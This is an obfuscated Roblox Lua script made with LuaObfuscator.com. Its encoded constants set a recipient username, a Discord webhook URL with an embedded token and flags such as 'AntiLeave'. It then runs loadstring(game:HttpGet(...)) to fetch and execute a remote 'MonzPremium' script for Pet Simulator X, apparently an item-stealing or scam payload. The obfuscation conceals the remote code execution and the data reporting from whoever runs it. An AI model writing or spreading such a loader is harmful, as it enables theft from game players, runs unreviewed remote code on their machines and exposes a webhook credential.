--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(878 -(282 + 595))) -(v32-(2 -(1 + 0)))) + (620 -(555 + 64)))) ;return v82-(v82%(1 -0)) ;else local v83=(933 -(857 + 74))^(v32-(1271 -(226 + 1044))) ;return (((v31%(v83 + v83))>=v83) and (569 -(367 + 201))) or (117 -(32 + 19 + 66)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (960 -(892 + 65)) );v19=v19 + (354 -(87 + 263)) ;return (v37 * (40022563 -23245347)) + (v36 * (121138 -55602)) + (v35 * (469 -213)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 -0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38~=(12 -9)) then else v45=nil;while true do local v89=0;while true do if (v89==0) then if (v39~=(3 + 0)) then else local v99=0;while true do if (v99~=(651 -(494 + 157))) then else for v144=1 -0 ,v24() do v41[v144-1 ]=v29();end return v43;end end end if (v39==0) then local v100=0;while true do if ((0 + 0)==v100) then v40={};v41={};v100=1 + 0 ;end if (v100~=1) then else v42={};v39=1;break;end end end v89=1;end if (v89==1) then if (v39~=2) then else local v101=0;local v102;while true do if ((0 + 0)==v101) then v102=0;while true do if (v102~=1) then else for v156=837 -(660 + 176) ,v24() do local v157=0 + 0 ;local v158;local v159;while true do if (v157==(203 -(14 + 188))) then while true do if (v158~=0) then else v159=v22();if (v21(v159,1,676 -(534 + 141) )~=(0 + 0)) then else local v170=0 + 0 ;local v171;local v172;local v173;local v174;local v175;while true do if (v170~=2) then else v175=nil;while true do if (v171~=(1 + 0)) then else local v178=0;local v179;while true do if (v178==(0 -0)) then v179=0;while true do if (v179==1) then v171=2 -0 ;break;end if (v179==0) then local v191=0 -0 ;while true do if (v191==0) then v174=nil;v175=nil;v191=1;end if (v191~=1) then else v179=1 + 0 ;break;end end end end break;end end end if (v171==(2 + 0)) then while true do if (v172==(396 -(115 + 281))) then local v181=0;local v182;local v183;while true do if (v181==1) then while true do if (v182==(0 -0)) then v183=0 + 0 ;while true do if ((2 -1)==v183) then v172=1;break;end if (v183~=0) then else v173=v21(v159,7 -5 ,3);v174=v21(v159,871 -(550 + 317) ,6);v183=1 -0 ;end end break;end end break;end if ((0 -0)==v181) then v182=0 -0 ;v183=nil;v181=1;end end end if (v172~=(287 -(134 + 151))) then else local v184=1665 -(970 + 695) ;local v185;while true do if (v184==(0 -0)) then v185=1990 -(582 + 1408) ;while true do if ((0 -0)~=v185) then else local v192=0;while true do if (1==v192) then v185=1;break;end if (v192~=0) then else if (v21(v174,1 -0 ,1)==1) then v175[7 -5 ]=v45[v175[2]];end if (v21(v174,2,2)~=1) then else v175[1827 -(1195 + 629) ]=v45[v175[3]];end v192=1 -0 ;end end end if (v185~=1) then else v172=3;break;end end break;end end end if ((244 -(187 + 54))~=v172) then else if (v21(v174,783 -(162 + 618) ,3)~=(1 + 0)) then else v175[3 + 1 ]=v45[v175[8 -4 ]];end v40[v156]=v175;break;end if (v172==1) then local v187=0;local v188;while true do if (0==v187) then v188=0;while true do if (v188==(1 -0)) then v172=2;break;end if (v188==(0 + 0)) then local v193=0;local v194;while true do if (v193==0) then v194=1636 -(1373 + 263) ;while true do if (v194==1) then v188=1;break;end if (v194==0) then local v199=1000 -(451 + 549) ;while true do if (v199==1) then v194=1 + 0 ;break;end if ((0 -0)~=v199) then else v175={v23(),v23(),nil,nil};if (v173==0) then local v200=1384 -(746 + 638) ;local v201;local v202;while true do if (v200~=0) then else v201=0 + 0 ;v202=nil;v200=1;end if (v200==1) then while true do if (v201==(0 -0)) then v202=341 -(218 + 123) ;while true do if (v202==(1581 -(1535 + 46))) then v175[3]=v23();v175[4]=v23();break;end end break;end end break;end end elseif (v173==(1 + 0)) then v175[1 + 2 ]=v24();elseif (v173==2) then v175[563 -(306 + 254) ]=v24() -(2^(1 + 15)) ;elseif (v173==3) then local v205=0;local v206;while true do if ((0 -0)==v205) then v206=0;while true do if (v206==(1467 -(899 + 568))) then v175[3]=v24() -((2 + 0)^(38 -22)) ;v175[607 -(268 + 335) ]=v23();break;end end break;end end end v199=291 -(60 + 230) ;end end end end break;end end end end break;end end end end break;end if (v171==(572 -(426 + 146))) then local v180=0;while true do if (0~=v180) then else v172=0 + 0 ;v173=nil;v180=1;end if (v180==(1457 -(282 + 1174))) then v171=812 -(569 + 242) ;break;end end end end break;end if (v170~=(0 -0)) then else v171=0;v172=nil;v170=1 + 0 ;end if (v170==1) then v173=nil;v174=nil;v170=1026 -(706 + 318) ;end end end break;end end break;end if (v157==(1251 -(721 + 530))) then v158=1271 -(945 + 326) ;v159=nil;v157=2 -1 ;end end end v39=3;break;end if (v102==(0 + 0)) then local v153=700 -(271 + 429) ;while true do if (v153==1) then v102=1;break;end if (v153~=0) then else for v165=1 + 0 ,v44 do local v166=1500 -(1408 + 92) ;local v167;local v168;local v169;while true do if ((1087 -(461 + 625))==v166) then v169=nil;while true do if (v167==(1289 -(993 + 295))) then if (v168==(1 + 0)) then v169=v22()~=(1171 -(418 + 753)) ;elseif (v168==(1 + 1)) then v169=v25();elseif (v168==(1 + 2)) then v169=v26();end v45[v165]=v169;break;end if (v167==0) then local v177=0 + 0 ;while true do if (v177==(1 + 0)) then v167=530 -(406 + 123) ;break;end if (v177==(1769 -(1749 + 20))) then v168=v22();v169=nil;v177=1;end end end end break;end if (v166==0) then v167=0 + 0 ;v168=nil;v166=1323 -(1249 + 73) ;end end end v43[3]=v22();v153=1 + 0 ;end end end end break;end end end if (v39~=(1146 -(466 + 679))) then else v43={v40,v41,nil,v42};v44=v24();v45={};v39=1 + 1 ;end break;end end end break;end if (v38==(0 + 0)) then v39=0 -0 ;v40=nil;v38=1;end if ((2 -1)==v38) then v41=nil;v42=nil;v38=2;end if (v38~=(116 -(4 + 110))) then else v43=nil;v44=nil;v38=3;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=584 -(57 + 301 + 226) ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(1428 -((88 -47) + 1386))) then v49=104 -(17 + 86) ;v50=(v21(v48,1 + (0 -0) ,(98 -54) -24 ) * ((2 + 0)^(92 -60))) + v47 ;v46=128 -(34 + 82 + 10) ;end if (v46==(166 -(122 + 44))) then v47=v24();v48=v24();v46=1 -(0 -0) ;end if (v46==(9 -6)) then if (v51==((753 -(239 + 514)) + 0)) then if (v50==(0 + 0)) then return v52 * (0 + 0 + 0) ;else local v98=0 -0 ;while true do if ((0 -0)==v98) then v51=(1330 -(797 + 532)) + 0 ;v49=0 -0 ;break;end end end elseif (v51==(2452 -(118 + 287))) then return ((v50==(65 -(30 + 35))) and (v52 * ((1 + 0)/(1257 -(1043 + 156 + 58))))) or (v52 * NaN) ;end return v8(v52,v51-(3867 -2844) ) * (v49 + (v50/((1214 -(323 + 300 + 589))^(429 -(142 + 235))))) ;end if (v46==(9 -(16 -9))) then v51=v21(v48,56 -35 ,611 -(361 + 219) );v52=((v21(v48,60 -28 )==(321 -(53 + (1469 -(373 + 829))))) and  -(1 + 0)) or (414 -(15 + 398)) ;v46=985 -(18 + 964) ;end end end v26=nil;function v26(v53)local v54=0;local v55;local v56;while true do if ((733 -(476 + 255))==v54) then v56={};for v90=1131 -(369 + 761) , #v55 do v56[v90]=v2(v1(v3(v55,v90,v90)));end v54=2 + 1 ;end if (v54==(1 -0)) then v55=v3(v16,v19,(v19 + v53) -(1 -0) );v19=v19 + v53 ;v54=2;end if (v54==3) then return v6(v56);end if (v54==(238 -(49 + 15 + 174))) then v55=nil;if  not v53 then local v97=(216 -(42 + 174)) + 0 ;while true do if (v97==(0 -0)) then v53=v24();if (v53==0) then return "";end break;end end end v54=337 -(144 + 192) ;end end end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58=(1975 -(1913 + 62)) + 0 ;local v59;local v60;while true do if (v58==(0 + 0)) then v59,v60=v1(v16,v19,v19 + (1506 -(363 + 1141)) );v19=v19 + (1582 -(1183 + 397)) ;v58=2 -1 ;end if (v58==(1 + 0)) then return (v60 * (192 + 64)) + v59 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v84=0;while true do if (v84==0) then v20=v0(v3(v61,1,1));return "";end end else local v85=v2(v0(v61,16));if v20 then local v92=v5(v85,v20);v20=nil;return v92;else return v85;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=9) then if (v81<=4) then if (v81<=1) then if (v81==0) then v78[v80[2]][v80[3]]=v80[4];else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=2) then do return;end elseif (v81==3) then local v128=v80[2];local v129=v78[v80[3]];v78[v128 + 1 ]=v129;v78[v128]=v129[v80[4]];else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=6) then if (v81>5) then v64[v80[3]]=v78[v80[2]];else local v108=0;local v109;while true do if (v108==0) then v109=v80[2];v78[v109]=v78[v109](v13(v78,v109 + 1 ,v73));break;end end end elseif (v81<=7) then do return;end elseif (v81>8) then v78[v80[2]]();else v78[v80[2]][v80[3]]=v80[4];end elseif (v81<=14) then if (v81<=11) then if (v81==10) then v78[v80[2]]=v80[3];else v78[v80[2]]=v64[v80[3]];end elseif (v81<=12) then v78[v80[2]]=v80[3];elseif (v81==13) then v78[v80[2]]=v64[v80[3]];else v78[v80[2]]();end elseif (v81<=16) then if (v81>15) then v64[v80[3]]=v78[v80[2]];else local v118=0;local v119;local v120;local v121;local v122;while true do if (v118==0) then v119=v80[2];v120,v121=v71(v78[v119](v13(v78,v119 + 1 ,v80[3])));v118=1;end if (v118==1) then v73=(v121 + v119) -1 ;v122=0;v118=2;end if (v118==2) then for v151=v119,v73 do local v152=0;while true do if (v152==0) then v122=v122 + 1 ;v78[v151]=v120[v122];break;end end end break;end end end elseif (v81<=17) then local v123=v80[2];local v124=v78[v80[3]];v78[v123 + 1 ]=v124;v78[v123]=v124[v80[4]];elseif (v81==18) then local v138=v80[2];local v139,v140=v71(v78[v138](v13(v78,v138 + 1 ,v80[3])));v73=(v140 + v138) -1 ;local v141=0;for v149=v138,v73 do local v150=0;while true do if (v150==0) then v141=v141 + 1 ;v78[v149]=v139[v141];break;end end end else local v142=0;local v143;while true do if (v142==0) then v143=v80[2];v78[v143]=v78[v143](v13(v78,v143 + 1 ,v73));break;end end end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0F3O0003083O00557365724E616D65030B3O00546568507563756B5F2O3503093O00557365724E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130352O33383937333237363039383634302F303675674A7752434E666F394A454B7A476376686950516A7A347637322D7165554831487A334D6E52537041714D6374654179713450786B35436D705A4335735853787503023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B0100030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F53757065724D6F6E7A2F5073785F53632F6D61696E2F4D6F6E7A5072656D69756D00153O00120A3O00023O0012103O00013O00120A3O00023O0012103O00033O00120A3O00053O0012103O00043O00120D3O00063O00304O0007000800120D3O00063O00304O0009000800120D3O00063O00304O000A000B00120D3O000C3O00120D0001000D3O00200300010001000E00120A0003000F4O0004000400014O0012000100044O00055O00022O000E3O000100012O00023O00017O00",v9(),...);end